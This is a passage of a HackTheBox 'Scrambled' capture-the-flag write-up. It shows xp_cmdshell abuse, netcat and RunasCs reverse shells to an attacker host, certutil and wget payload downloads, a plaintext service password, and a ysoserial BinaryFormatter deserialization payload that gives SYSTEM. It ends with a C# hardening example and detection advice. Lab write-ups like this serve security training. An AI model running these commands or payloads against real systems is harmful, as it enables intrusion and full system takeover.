[*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> RECONFIGURE;
SQL (SCRM\administrator dbo@master)> EXECUTE xp_cmdshell 'whoami';
output
-----------
scrm\sqlsvc

NULL

SQL (SCRM\administrator dbo@master)>

22. xp_cmdshell is usable now, so let's start enumerating and set up a reverse shell

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c pwd"
output
-------------------
NULL

Path

----

C:\Windows\system32

NULL

NULL

NULL

SQL (SCRM\administrator dbo@master)> xp_cmdshell "powershell -c net user"
output
-------------------------------------------------------------------------------
NULL

User accounts for \\DC1

NULL

-------------------------------------------------------------------------------

administrator asmith backupsvc

ehooker Guest jhall

khicks krbtgt ksimpson

miscsvc rsmith sdonington

sjenkins sqlsvc tstar

The command completed successfully.

NULL

NULL

SQL (SCRM\administrator dbo@master)>

SQL (SCRM\administrator dbo@master)> xp_cmdshell "powershell -c cd C:\Users\sqlsvc\Downloads; wget http://10.10.14.27/nc.exe -outfile nc.exe"
output
------
NULL

SQL (SCRM\administrator dbo@master)> xp_cmdshell "powershell -c cd C:\Users\sqlsvc\Downloads; .\nc.exe -e powershell 10.10.14.27 443"


┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.168 - - [08/Apr/2024 21:26:53] "GET /nc.exe HTTP/1.1" 200 -

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.11.168] 52616
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\sqlsvc\Downloads> whoami
whoami
scrm\sqlsvc
PS C:\Users\sqlsvc\Downloads>

23. We now have a shell, but this is not the first user yet. The account found in the database appears to match an account on the system, so can we use the password learned from the database to get a shell as that user?

MiscSvc

ScrambledEggs9900

runas /user:MiscSvc ScrambledEggs9900 cmd

24. Below we use the RunasCs tool from GitHub, which makes it convenient to get a reverse shell with runas-style credentials

PS C:\Users\sqlsvc\Downloads> certutil -urlcache -f http://10.10.14.27/RunasCs.exe RunasCs.exe  
certutil -urlcache -f http://10.10.14.27/RunasCs.exe RunasCs.exe
**** Online ****
CertUtil: -URLCache command completed successfully.

PS C:\Users\sqlsvc\Downloads> dir
dir


Directory: C:\Users\sqlsvc\Downloads


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 08/04/2024 14:23 68608 nc.exe
-a---- 08/04/2024 14:40 51712 RunasCs.exe



PS C:\Users\sqlsvc\Downloads>

25. Try to get a reverse shell

┌──(kali㉿offsec)-[~/Desktop/tools/RunasCs]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.168 - - [08/Apr/2024 21:44:10] "GET /RunasCs.exe HTTP/1.1" 200 -
10.10.11.168 - - [08/Apr/2024 21:44:10] "GET /RunasCs.exe HTTP/1.1" 200 -

.\RunasCs.exe miscsvc ScrambledEggs9900 powershell -r 10.10.14.27:4444 -l 3

PS C:\Users\sqlsvc\Downloads> .\RunasCs.exe miscsvc ScrambledEggs9900 powershell -r 10.10.14.27:4444 -l 3
.\RunasCs.exe miscsvc ScrambledEggs9900 powershell -r 10.10.14.27:4444 -l 3
[*] Warning: LoadUserProfile failed due to insufficient permissions

[+] Running in session 0 with process function CreateProcessAsUserW()
[+] Using Station\Desktop: Service-0x0-659c0$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4884 created in background.

PS C:\Users\sqlsvc\Downloads>

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.11.168] 52756
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\System32> whoami
whoami
scrm\miscsvc
PS C:\Windows\System32>

26. Now grab the first flag

PS C:\Windows\System32> cd C:/Users/miscsvc/Desktop
cd C:/Users/miscsvc/Desktop
PS C:\Users\miscsvc\Desktop> ls
ls


Directory: C:\Users\miscsvc\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 08/04/2024 13:51 34 user.txt


PS C:\Users\miscsvc\Desktop> cat user.txt
cat user.txt
6f64590b0e88f8d45ed503061a74bf09
PS C:\Users\miscsvc\Desktop>

0x02 Obtaining system privileges

27. The following steps feel beyond what the OSCP exam covers, so I will mainly paste from the walkthrough reports

https://b0ysie7e.gitbook.io/articulos/write-up/hackthebox/2024-03-15-scrambled#silver-ticket-attack

https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html

28. Pasted procedure steps

PS C:\Windows\System32> cd C:/Users/miscsvc/
cd C:/Users/miscsvc/
PS C:\Users\miscsvc> ls
ls


Directory: C:\Users\miscsvc


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 03/11/2021 19:32 Desktop
d-r--- 03/11/2021 23:40 Documents
d-r--- 15/09/2018 08:19 Downloads
d-r--- 15/09/2018 08:19 Favorites
d-r--- 15/09/2018 08:19 Links
d-r--- 15/09/2018 08:19 Music
d-r--- 15/09/2018 08:19 Pictures
d----- 15/09/2018 08:19 Saved Games
d-r--- 15/09/2018 08:19 Videos


PS C:\Users\miscsvc> cd Downloads
cd Downloads
PS C:\Users\miscsvc\Downloads> ls
ls
PS C:\Users\miscsvc\Downloads>

PS C:\Users\miscsvc\Downloads> certutil -urlcache -f http://10.10.14.27/winPEASx64.exe winPEASx64.exe
certutil -urlcache -f http://10.10.14.27/winPEASx64.exe winPEASx64.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
PS C:\Users\miscsvc\Downloads>

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.168 - - [08/Apr/2024 21:53:29] "GET /winPEASx64.exe HTTP/1.1" 200 -
10.10.11.168 - - [08/Apr/2024 21:55:06] "GET /winPEASx64.exe HTTP/1.1" 200 -

PS C:\Users\miscsvc\Downloads> ls
ls


Directory: C:\Users\miscsvc\Downloads


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 08/04/2024 14:52 2387456 winPEASx64.exe


PS C:\Users\miscsvc\Downloads>

╔══════════╣ LAPS Settings
╚ If installed, local administrator password is changed frequently and is restricted by ACL
LAPS Enabled: LAPS not installed


╔══════════╣ LSA Protection
╚ If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#lsa-protection
LSA Protection is not enabled

╔══════════╣ Credentials Guard
╚ If enabled, a driver is needed to read LSASS memory https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#credential-guard
CredentialGuard is not enabled

╔══════════╣ Cached Creds
╚ If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials
cachedlogonscount is 10

╔══════════╣ Enumerating saved credentials in Registry (CurrentPass)

╔══════════╣ AV Information
[X] Exception: Invalid namespace
No AV was detected!!


╔══════════╣ Checking KrbRelayUp
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system is inside a domain (SCRM) so it could be vulnerable.
╚ You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges


Name CurrentUserPerms Sddl

eventlog Everyone [WriteData/CreateFiles] O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)

ROUTER Everyone [WriteData/CreateFiles] O:SYG:SYD:P(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;SY)

RpcProxy\49675 Everyone [WriteData/CreateFiles] O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)

RpcProxy\593 Everyone [WriteData/CreateFiles] O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)

sql\query Everyone [WriteData/CreateFiles] O:S-1-5-21-2743207045-1827831105-2542523200-1613G:S-1-5-21-2743207045-1827831105-2542523200-1620D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-2743207045-1827831105-2542523200-1613)

SQLLocal\MSSQLSERVER Everyone [WriteData/CreateFiles] O:S-1-5-21-2743207045-1827831105-2542523200-1613G:S-1-5-21-2743207045-1827831105-2542523200-1620D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-2743207045-1827831105-2542523200-1613)

vgauth-service Everyone [WriteData/CreateFiles] O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)


Scramble Sales Orders Server(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Autoload - No quotes and Space detected

PS C:\Users\shiyan\Desktop\ysoserial-Release> .\ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "c:\Users\miscsvc\Downloads\nc.exe -e cmd.exe 10.10.14.27 10086" -t
AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAAkApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBN1FVOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUdNNlhGVnpaWEp6WEcxcGMyTnpkbU5jUkc5M2JteHZZV1J6WEc1akxtVjRaU0F0WlNCamJXUXVaWGhsSURFd0xqRXdMakUwTGpJM0lERXdNRGcySWlCVGRHRnVaR0Z5WkVWeWNtOXlSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJUZEdGdVpHRnlaRTkxZEhCMWRFVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdWWE5sY2s1aGJXVTlJaUlnVUdGemMzZHZjbVE5SW50NE9rNTFiR3g5SWlCRWIyMWhhVzQ5SWlJZ1RHOWhaRlZ6WlhKUWNtOW1hV3hsUFNKR1lXeHpaU0lnUm1sc1pVNWhiV1U5SW1OdFpDSWdMejROQ2lBZ0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnUEM5elpEcFFjbTlqWlhOelBnMEtJQ0E4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1UFltcGxZM1JKYm5OMFlXNWpaVDROQ2p3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeVBncz0L

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc 10.10.11.168 4411
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;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
ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation.


┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 10086
listening on [any] 10086 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.11.168] 58468
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
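
As an added illustration for this step (written for this writeup, not taken from ScrambleServer.exe, whose source is not shown here), the C# sketch below models the port-4411 order handler in its vulnerable form beside a hardened one. The `SalesOrder` type, the method names, the `ORDER_ACCEPTED;` reply and the JSON replacement are assumptions; only the `UPLOAD_ORDER;<base64>` / `ERROR_GENERAL;...` framing and the BinaryFormatter sink come from the nc session and the machine description.

```csharp
// Added example: a minimal model of the port-4411 order handler, written for
// this writeup. It is NOT ScrambleServer.exe's real source (not on the page);
// the SalesOrder type, method names, ORDER_ACCEPTED reply and the JSON
// replacement are assumptions. Only the "UPLOAD_ORDER;<base64>" /
// "ERROR_GENERAL;..." framing and the BinaryFormatter sink come from the page.
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Text.Json;

[Serializable]
public class SalesOrder
{
    public string Customer { get; set; } = "";
    public decimal Total { get; set; }
}

public static class OrderHandlers
{
    // VULNERABLE (the pattern exploited above): BinaryFormatter rebuilds
    // whatever object graph the client encoded. Gadget types carried in the
    // payload are instantiated, and their callbacks run, inside Deserialize(),
    // before the cast to SalesOrder is ever evaluated.
    public static SalesOrder HandleUploadOrderUnsafe(string base64Payload)
    {
        byte[] raw = Convert.FromBase64String(base64Payload);
        var formatter = new BinaryFormatter();
        using (var ms = new MemoryStream(raw))
        {
            return (SalesOrder)formatter.Deserialize(ms);
        }
    }

    // HARDENED: a data-only format. The payload carries no type information,
    // so System.Text.Json can only ever construct SalesOrder; a hostile
    // message can contain bad values but cannot choose which types load.
    // Needs .NET Core 3.0+/.NET 5+ or the System.Text.Json NuGet package.
    public static SalesOrder HandleUploadOrderSafe(string base64Payload)
    {
        byte[] raw = Convert.FromBase64String(base64Payload);
        var options = new JsonSerializerOptions { MaxDepth = 8 };   // bound nesting
        var order = JsonSerializer.Deserialize<SalesOrder>(raw, options);
        if (order == null || string.IsNullOrWhiteSpace(order.Customer) || order.Total < 0)
            throw new InvalidDataException("sales order failed validation");
        return order;
    }

    // One protocol line as seen in the nc session: "COMMAND;ARGUMENT".
    // The delegate lets the same dispatcher be wired to either sink.
    public static string Dispatch(string line, Func<string, SalesOrder> handler)
    {
        int sep = line.IndexOf(';');
        string command = sep < 0 ? line : line.Substring(0, sep);
        string argument = sep < 0 ? "" : line.Substring(sep + 1);
        if (command != "UPLOAD_ORDER")
            return "ERROR_GENERAL;Unknown command";
        try
        {
            SalesOrder order = handler(argument);
            return "ORDER_ACCEPTED;" + order.Customer;   // reply string assumed
        }
        catch (Exception ex)
        {
            // Same error text the real service returned to nc above.
            return "ERROR_GENERAL;Error deserializing sales order: " + ex.Message;
        }
    }

    public static void Main()
    {
        // Constructed benign JSON order; the BinaryFormatter sink is never called here.
        string json = "{\"Customer\":\"ACME\",\"Total\":42.5}";
        string b64 = Convert.ToBase64String(Encoding.UTF8.GetBytes(json));
        Console.WriteLine(Dispatch("UPLOAD_ORDER;" + b64, HandleUploadOrderSafe));

        // Garbage bytes reach the JSON parser and the validation path, not a type loader.
        string junk = Convert.ToBase64String(new byte[] { 1, 2, 3 });
        Console.WriteLine(Dispatch("UPLOAD_ORDER;" + junk, HandleUploadOrderSafe));
    }
}
```

Microsoft's guidance is that `BinaryFormatter` cannot be made safe for untrusted input, and that a restrictive `SerializationBinder` is not a reliable substitute for replacing it; the hardened handler therefore changes the wire format rather than filtering types. On the defensive side, the `ERROR_GENERAL;Error deserializing sales order` reply the service sends back is also the signal to log and alert on: a burst of those errors on port 4411, followed by a child process spawned by `ScrambleServer.exe` running as SYSTEM, is exactly the sequence shown in the transcripts above.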

29. Retrieve the flag

C:\Windows\system32>cd C:/Users/Administrator/Desktop
cd C:/Users/Administrator/Desktop

C:\Users\administrator\Desktop>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5805-B4B6

Directory of C:\Users\administrator\Desktop

29/05/2022 21:02 <DIR> .
29/05/2022 21:02 <DIR> ..
08/04/2024 13:51 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 15,693,377,536 bytes free

C:\Users\administrator\Desktop>type root.txt
type root.txt
f4eb5479c772ab82e1eb74b48961f98c

C:\Users\administrator\Desktop>

0x03 Completion Proof

https://www.hackthebox.com/achievement/machine/1705469/476


Scrambled-htb-writeup
https://sh1yan.top/2024/04/07/Scrambled-htb-writeup/
Author: shiyan
Published: 7 April 2024
License